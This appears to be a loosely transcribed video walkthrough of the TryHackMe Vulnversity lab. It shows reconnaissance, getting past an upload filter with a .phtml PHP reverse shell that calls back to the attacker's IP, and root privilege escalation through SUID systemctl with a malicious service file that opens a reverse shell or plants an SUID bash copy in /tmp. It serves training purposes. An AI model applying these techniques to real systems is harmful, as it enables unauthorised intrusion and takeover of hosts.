Alright, welcome back. Haas is going insane again. We'll have to take down the alert box again, Haas. But, yes, welcome back. Today we're going to be doing Vulnversity on Try Hack Me. And we'll hop through this and we'll see what we can do. So, it says deploy the machine. I already did that one right there. And we'll go ahead and do a copy. Copy that to clipboard and we'll do a, let's see here. Let's go ahead and just start off with the mmap scan. We'll see what we can do with this. I don't want to read any of the little walkthrough things. We're just going to go at it and see what we can find in it. So we got port 22. We obviously have port 445, 139. See if we do anything with that. Some B client. Maybe like an enum for Linux. No passwords. Try like enum for Linux. Doesn't look like there's anything in there that we can really use actually. Always try that. Enum for Linux. Not getting much else. Go ahead and try a rust scan with it. Might have higher up ports or something. You got port 3333 and a 3128. Whoops. Let's go ahead and try it over here now. What was that? 3128. See what those two are all about. And let's also just see if those are actually web directories there. We got 3333 right, and then 3128. Okay, that one looks like a web directory. What about 3128? Alright, that's a invalid, your cache, squid. Alright, so this is a squid proxy, like right here it looks like. Alright, we got ourselves a web directory here. Let's go ahead and start doing a GoBuster scan on it. And we'll start clicking around on there while GoBuster's doing its thing. GoBuster, tac URL, where is it? GoBuster, I forget the syntax for it. Is it just tac U? Maybe? Command help. Maybe it's just nothing. GoBuster. Oh. HTTP. Tac W, we'll use user share wordless derby, and then maybe big dot text. Start off with that. We'll try with 200 threads. Why am I getting lost in GoBuster like right now? Dir tac U, there we go. I'll say, wait a minute. This one's already using medium dot text, might as well stick with that. Let's use 3333. What a big dot text. Medium dot text is pretty big. Maybe 200 threads. Try with that, see how many problems we get. There's our Apache web server, 2.4.18. There's our squid proxy server, 3.512. Let's go ahead and do a search exploit for squid, 3.5. 3.3.5, that's it. Alright, GoBuster ain't able to detect anything. Huh, really? On port 3333, which is this guy like right here. So we have about, courses, teacher, nothing changing up here, blog, events, contact, apply now. Give that one more try maybe? That's 78, right? Oh, probably because I didn't change out the IP address, huh? There we go. There we go. Alright, so we'll let big dot text do its thing here, and we'll head back over here. Apply now, nothing. View courses, nothing. So, worst website ever. It's the worst university's website. Alright, that's taking its time doing that. If I click on university, course you want to study, let's try A. Search, see if that does anything. Let's make sure we can also still ping it because it looks like I think 200 might be a little bit too many. Let's just try just straight up. Alright, so search A, that doesn't have anything up top, nothing down here, so I don't think we're going to be able to, nothing up here like question mark PHP. We got some people over here, got some usernames maybe, no, the same person. Our experienced advisor, same guy, different pictures. What we got up here? Same guy, Dennis Green. And Dennis Green, he left a lot of comments there. And roll now, does that do anything? Brings me all the way back up top. Okay. Alright, nothing with that. So far, not finding anything. Let's go ahead and try control. What if we do enter email? Subscribe? Nope, okay. Let's go ahead and do a control U, see if we get anything with this. And navigation. Looking for anything that's in green that can help us out here. Any notes, color lib, that's normal. Alright, so all that's pretty normal stuff, like right there. Do they have maybe like a robots or an uploads or an upload? Upload? Uploads? Okay, robots, got text. Do they have like an admin section? Admin? Admin. Okay, it's not finding anything in there so far. So I'm going to back over into GoBuster, see if he found anything yet. He has not yet. He's moving pretty slow though. So, like Vol? For Vulnversity? No, nothing there. Alright, so we're just going to kind of just have to chill and wait, I guess, for GoBuster here. Not really seeing much else that we can do on this guy like right now. Fly now, because none of these links up top work. Index.html, yep, okay. Pretty normal, like right there. Doesn't look like I can upload anything into here. Can't leave any comments, so I can't do anything like cross-site scripting or anything like that. I also don't have a cookie just for coming to the site. Nothing like that. Copyright 2021. Nope. Nothing there. Can I get to like an admin panel? Nope. Alright, so nothing really seems to be changing. So we'll wait on this GoBuster to do its thing. And or if we can do it with make it a little bit faster here. Try to do it with like TAC T50 or something like that. Connection refused. Unable to connect. Oh, /home. Oh, probably because there's no such thing. What the /home is there? Ten 202.78 or 3333. There we go. We also have that squid proxy up and running, but okay, this one found /images. /images. Which makes me feel like we should be able to upload something. What are these images? Just straight up. Okay. So we got images. Do we have like an images upload? Or images uploads? No, nothing there yet. Okay. /internal. Let's see what that's all about. /internal there. Alright, we can upload an image. Let's go ahead and I already made a directory for this guy, so let's go ahead and copy over something. Stop him. Clear that out. And let's go ahead and do a we'll copy from pentest monkey over into here. We'll just move that PHP shell into shell.php. And we'll go ahead and cat that shell.php, make sure the IP addresses add up. 10.98.166, port 4444. I have config 10.98.166, we're good with that. Let's go ahead and try to load that in here and see if we can get anything with that. So we'll go to try hack me, Vulnversity, right? Vulnversity, shell.php. Submit. No file select extension not allowed. There's a ways around that. Let's go ahead and start burp suite and see what we can send up. We can always do like a P, capital H, lowercase p. We can always do something like that. Do PHTML. That's one of them. and we can try. Let's go ahead and browse, and we'll try this again. Then we're just going to try to make quite a few different things here. We'll send that off to the repeater. And let's go ahead and try. We know that PHP doesn't work well. PHP like that. Send that off. Extension not allowed. Oh, I also put that little guy at the end there. Let's try it again. Send him off. No. Okay. PHP.jpg. Is that allowed? Extension not allowed. What about JPEG.php? That's probably gonna be a big no. What about .gif? Is GIF allowed? Something like that. Extension not allowed. PHTML. Is that allowed? PHTML1. Okay, we got somewhere. Upload, and it was successful. Alright, so PHTML. So now, where did you upload to? Internal/upload or internal/uploads? Maybe something like that. Guess we could always do one of these and then /internal. Then while that guy's running, we'll try it manually also. Turn off those settings. We'll let's go ahead and try stop. We know what upload is, so internal/upload. Uploads. Okay, internal/uploads. So that guy's there. Alright, let's go ahead and do an NC tag LVMP 4444. This guy would have found it after so long. So he actually did find /uploads. That was the very first thing they found. So I was about to say he would have found it. So if you didn't try it manually, he would have gotten there. So we have our listener up and ready, right? Listening on any 4444 shell PHTML. That's hanging, and we get a call back. Alright, cool. So we are good with that. Let's go ahead and clear all this stuff out. Probably exit out a couple of these things too. There we go. So we got more room here. Then we'll cat our scripts full shell, right? And let's go ahead and do a which Python user bin Python, so we can throw that guy into there. All right, cool. Are we clear now? No. All right. So let's go ahead and start looking around. Let's go to cd etc passwords, see who's actually on this box, or cd etc cat etc password. I don't know why I'm trying to cd into a. So we got Bill on here. He can do a bin bash, and root can do bin bash, and those are the only two people I can actually get in here. Can we actually do like a? I really tried this before. Something like that. Yeah, we can. Okay, cool. So we got root and Bill that can do bin bash. Alright. So let's go ahead and CD into Bill. Or CD into /home Bill. Then we get our, okay, cat our user.text there. Cool. Let's go ahead and grab him and see what else we've got to get being asked the whole time. So there's quite a few questions on this thing. So reconnaissance. Yep, we did all that. Scan the box. How many ports are open? Crap. We're going to have to do that one again. I do not remember. Maybe I should actually read the questions beforehand. So we got 1, 2, 3, 4, 5, 6. It looks like. Maybe there's only 6. Hopefully, we'll say 6. Okay. What version is Squid Proxy? 3.4. I forgot what version it was, but it was 3128. 3128 was the 3.5.12. How many ports one map scan? TAC P400 was used? No. TAC P TAC 400. Same thing. I think that's going to be anything below 400, so it should only scan like, yeah, it should only scan a couple of them, so it could be, how many ports one map scan was used? Like 003? There's only 3 in there. Okay, that's what he's asking. Using the mmap flag tech n will not resolve DNS. Was most likely operating system Linux. What port? Yes, it is. Or is it Ubuntu? What port is the web server running on? 3333. Pointer sure always doing a constant background. Okay, already did that. Alright, it looked like /internal, right, was the port that had the upload form. Compromised web server, we did that. Completed that. Okay, what is the name of the user who manages the web server? Bill is the name of that user. Try to ask for, okay, try to upload a few items. What common extensions needs to be blocked? .php does. Because we got to use PHTML, right? Runs attack, what extensions allowed? PHTML. Oh, he did that like little thing and then went ahead and that was a good idea. Use burp suite to actually like see what extensions were allowed. What was the user flag? Now we got something. Okay. It's more of a walkthrough style box. And then privilege escalation. Okay, cool. Let's go ahead and see. We'll cat our scripts SUID lookup because we don't know a password or anything like that yet, right? There's no passwords in eti password, so we can't leak anything like that. And let's see what we got here. Systemctl. I don't think that's normal. Systemctl. We'll look it up, but we're also going to run we're going to copy over privilege escalation off script limpes. Then we'll go ahead and do a Python web server. We're going to copy that over wget http 10.9.8.166.8888/limpes.sh. And we'll go ahead and change mode, make that executable for limpes.sh. Should know what's talking thing. Okay, cool. And yeah, let's go ahead and run that limpes.sh. So Linux version's date. Well, 4.4 is, but we don't know much else from there. Doesn't look like they're running any type of internal. There we go. Internal MySQL or anything like that. Nothing with 127 on it. Permit root logins, yes. Okay. Yeah, systemctl. What can we do with that? GTFO bin systemctl. Systemctl, SUID. Ooh, okay. Can I just run just this? Go into cd user bin and just run that, see what happens? cd into bin, and we'll try just to run that. Create a system link, okay. Too few of arguments. Systemctl enable now. Try that again. Alright, systemctl, let's see here, abuse. Privilege escalation with systemctl. Payload execution. So it looks like he actually had to call back to him, right? So he did like a user root and had to call back to him. Let's go ahead and try that. Exec start. And then we have enable home root.service. Root service. Start root. Bin systemctl start root. 3-star service should see a root level shell on our listener. Alright, let's try that one like right there. So let's do let's go ahead and kind of minimize this guy down like a little bit. Get him over to the side. Make your guys' life easier. There we go. I can have all that stuff. Let's kind of do this number like right here. Alright. So let's go ahead and try that. So we have, pretty sure I gotta put in systemctl first, right? When I look at GTF opens, so I have to make a temp service and echo service. Type one shot. So right there, I'm going to type in my command to cat for scripts bash reverse shell. Okay, so let me go ahead and copy this, change that up. And we're going to do 10.98.166. Okay. Next start service bin bash. We're going to do a /bin shell, bin sh there, right? Bin bash. You did a bin bash. I'm going to try bin bash. Bin bash, tac C, and then let's go ahead and go down here. Not that, 'cause that's how he has it over there. Let's go ahead and copy this. Okay. Enter. That was, ooh, I did one shot. Let's do a exec start. Okay, wait 1 second. Type equals simple. Let's do that. User equals root. Exec start equals this whole thing. And then second install. Can I do that? Wanted by equals multi tac user dot target. Okay. And we have payload execution over here. So now we have to do a, is that it? User value set to usually wants a system to execute as in this case. We'll go single shell the exec start. So how do we like close it last time? Enable now? So he has bin system. So that was it for him. I wonder if we need to do this enable now. Wanted by multi-user target. No, maybe we should just do something like that. So that you have to reach no such file directory. Okay, I messed up somewhere. Let's go ahead and GTF opens, privilege escalation, systemctl. Okay, so he's like transferring a payload into there. On that one, like right there. Pretty sure I can just add in like an SUID bit though with systemctl. Log circus monkey. Using systemctl. Yeah, he's still. Could have sworn there's a way to like make a user. Nothing there. Systemctl priv-esc SUID. Privilege escalation. Whoopsie daisy. Let's go ahead and just copy that like right there. We'll start off the systemctl stuff, right? How the hell do we start it again? Echo service. Whoops. That didn't work. That's a good way just to exit out of your shell. That's what that is. There we go. Alright. This was a way just to very, very easy way just on the box itself. Why is my such a joke? And you could like make like a user. You don't really make a user, you just tell like, hey, like I want to run this with whatever. Systemctl. That's a reverse shell. I just want to do see, they're still calling back reverse shell. Example 2. Privilege escalation. Create symbol. That's example 1. This is example 2, like right here. Okay. Just do that. Also file or directory. Great. Sweet. I feel like this one like right here is not working for me very well. That's why. There's Vulnversity. And this one's also calling back to somebody else. Let's try some more of that, like right there. So we're going to go ahead and do our echo service, right? This was another way to do this. Type equals one shot. Exec start equals. Let's try bin sh this time. I'm actually going to put double quotes around this guy. Everywhere else you have double quotes except for that one article I read had single quotes. Tap C. And he's just doing NC. That's not a bad idea actually. NC tac E. I wonder if they have NC tac E on this box though. Bin bash. For 10.9.8.166. We'll say 4.9.9.9. That's not actually a bad idea. Then I'm supposed to get this thing install back. I feel like I'm not supposed to put that in. Wanted by multi-user target. I'm just going to go with exactly what he has. dj.service echo service. He's putting the same thing in again. Type equals one shot. Exec start equals NSH. Putting in that same exact thing again, it looks like. I don't know if it's case sensitive or not. Install wanted by equals multi-user.target dj It's not going to work like right there. Permission denied. That worked good for me. Alright, so that's not going to work like right there. So we have system CTL like right there. Right, yep. Yep. Okay, so we modify the code a little bit to retrieve the root flags here. Okay, so he's just doing an exec start, boom, boom, like that. Okay, let's try that. So he's going to cat that root flag. So we can try something like that. So he's doing pretty much all this. And from there, he's saying, hey, I want to go ahead and cat that root flag, right? Let's try that. Taxi cat root.text. And after we're done with this one, I want to look up one of the walkthroughs. I'm pretty sure I can actually become root with this. Temp output. Okay. Then we have install, wanted by, multi-user target. We have, yeah, we're already in bin, right? Well, up here we're already in bin. No, I'm not in bin. CD to bin. Maybe that's what my problem was with the last one, huh? That could have been my problem with that one also. Okay, we're already in bin. Boom, boom. Okay, so it created a system link. Now what? Next line is just echo the service. Okay. Now I can cat /temp output. Okay. Root.text. And he actually got a flag. We're just showing that, hey, root.text. So can I do a temp? Can I? Right. Can I do something like that? I don't want to cat anything. I want to make a user. So what is this one doing for all that? Damn it. Did not want to do that. See what GTFO bins is doing. He's making a ID. That's just showing the ID. That's all that's doing. I want to make a user, I think. Could do something like that. Right back to right where I started again. You know what, we're going to try this one. We're just going to go ahead, we're going to give it a shot. We're going to see if maybe I know there's a way to be able to do it just on the local box itself. That's what's kind of getting me like, what the heck. So that's cat root.service. So are we putting root.service into there? First need to find a variable directory on target file system. In this case I use a current. Called it root.service. Okay, so let's go ahead and do a nano root.service. Can I do that? Of course I can. Okay, so let's go ahead and do a nano root.service. Unit description equals root service type equals simple, user equals root, exec start equals bin bash, taxi grab that. 10.9.8.166. There we go. Install. Wanted by multi attack user dot target. Let's go ahead and start a Python server down here, right? Okay. We'll do a wget. Root.service. Cache refuse, a cd attempt, do that same thing. And then we'll just try copy it over to bin. 10.9.8.166. Oh crap. Okay, write to root.service. Success. Heck. Okay, so I have root.service in here now. Got it. That one got it. Go do that. Permission denied. Huh. It said it cannot write to it. Can I do that? Okay, so that file does not exist. Alright, so yeah, now we're definitely going with another way, huh? Target file system, if it's not there already, once that's done. Well, I wonder if I can actually keep it in temp, and then do like a /bin system ctl enable /temp root.service. Do something like that with it. Maybe that. Create a symlink. Okay, cool. For multi-user target. Okay, and then bin systemctl start root. And let's go ahead and start with listener down here. We did it for port. What did we do it for? 9999, is that correct? Yeah. Alright, so let's go ahead and start up a /bin systemctl start root. Okay, yep, that got us callback. ID. Alright, and cd in the root. ls-la. And we got that root.text. Okay, so that got us callback. Now I want to look up one of the walkthroughs because I'm pretty positive we didn't need to do all that. I'm like 99% positive we didn't need to do all that. So let's go ahead and look at one of the walkthroughs and see another, like, if there's different ways. So let's go ahead and do a Vulnversity walkthrough. So I feel like we did not need to do half stuff we just did. IP address, web shells, okay. Submit, yep, did all that. Okay, use.text. Alright, so we found that systemctl. So he didn't upload anything, it looks like. He just said, hey, go ahead and do it like that. Bin bash actually cat root.text and put it in the op/flag, which we tried that one, but that one didn't really work for us, did it? We didn't put it into a folder, but that one didn't really work for us very well. See how this guy did it? Now EOP, what is this? He was still www data. He did the same thing where he catted it to something. I could have swore though you can make like a user kind of thing. Step launch security. Let's see what he has to say. Alright, went way too far. Here we go. Okay, so he actually became root. So, and it doesn't look like he's getting any type of callback here. So let's go ahead and see what he did. Find same steps outlined in GTF opens to create an SUID binary bash. Okay, so he followed the same exact steps, right? Boom, boom. Where did he change his up at? So he has CP temp staff and change mode to S temp staff. So let's go ahead and exit out here. We're going to try to get another shell going here. We're going to try this way also. So let's go ahead and get back into GTF opens. And it's going to be system CTL, right? SUID. Okay. So he followed pretty much all of that, except for he did change his up like a little bit. So he said, hey, I want to, he pretty much made a user kind of thing. So he said bin sh taxi, then he said copy / bin bash into / temp step. So I guess we can do anything here. I'm going to say Ryan. And change mode plus S, so create an SUID bit binary for temp Ryan. Okay. From there we did our install. We did our multi-user target. We did our system CTL. Let's go do a / bin just in case I'm in the wrong folder here up top. I don't mess anything up. And then he did ls / temp. Output is Steph. Okay. ls tac la. Then he did temp Steph tac p. What that tac p is for. I'm going to do that. Then do a / temp Ryan tac p. And we are root. There we go. So that's how to do a local privilege escalation instead of trying to have a callback to you and everything like that. That was way easier actually. I'm actually going to go ahead and copy this, put this into nano into scripts. We're going to do a system CTL. System CTL local privesc dot text. There we go. So we'll do that like right there, and then I should probably actually go back into that and then just say after everything has ran, do the following / temp Ryan tac p ID where am I whatever should be root. There we go. So I'm not, yeah, I am root. Okay, so now I can see the root tac la and do it like that also. So there's a couple different ways I can do it like right there. I find that way easier because then I don't have to create files. I don't have to do callbacks and everything like that. Try to send it to another listener and everything. It's always better once you're on the box, stay on the box, then you're not creating as much traffic outside that box that they can see with firewalls and everything else. So once you're in, you want to kind of just stay in there. So that looked pretty good. Well, you want to stay in for as long as possible, then get out. But yeah, okay, cool. So that was pretty cool. Oh, whoops, locating directories using GoBuster. Yeah, I completed that. Compromise web server. Submit. It's definitely PHTML. What do you mean? Oh, it's .PHTML. Alright, cool. There we go. So we did that one. Alright, awesome. Easy day, right?